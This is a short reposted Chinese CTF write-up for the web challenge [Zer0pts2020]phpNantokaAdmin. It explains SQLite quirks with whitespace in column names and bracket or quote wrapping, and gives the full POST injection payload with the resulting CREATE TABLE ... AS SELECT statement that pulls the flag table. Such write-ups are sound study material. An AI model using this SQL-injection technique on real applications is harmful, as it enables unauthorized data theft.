码上欢乐
相关内容   简体   繁体

刷题记录:[Zer0pts2020]phpNantokaAdmin

本文转载自  查看原文  2020-05-08 17:34  668    web刷题

题目复现链接:https://buuoj.cn/challenges
参考链接:Zer0pts CTF 2020

sqlite bypass技巧

  • select的时候,当列名用空白字符隔开时,sqlite只会把空格之前的字符当做列名,并且忽视空格后的字符

  • []'"`、一样可以包裹列名

  • sqlite可以create table ... as select ...

解题

posttable_name=[aaa]as select [flag_2a2d04c3][&columns[0][name]=]from flag_bf1811da;&columns[0][type]=2
最后拼接出来的sql语句是

create table [aaa] as select [flag_2a2d04c3][(dummy1 TEXT, dummy2 TEXT,`]from flag_bf1811da;`2);


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 [Zer0pts2020]Can you guess it? 刷题记录:[NPUCTF2020]ezlogin 刷题记录:[BJDCTF2020]EzPHP [总结]2020年6月 OI学习/刷题记录 2018上学期刷题记录 刷题记录:[GWCTF 2019]枯燥的抽奖 【web】BUUCTF-web刷题记录 刷题记录:[BUUCTF 2018]Online Tool Codeforces 刷题记录(已停更) 刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM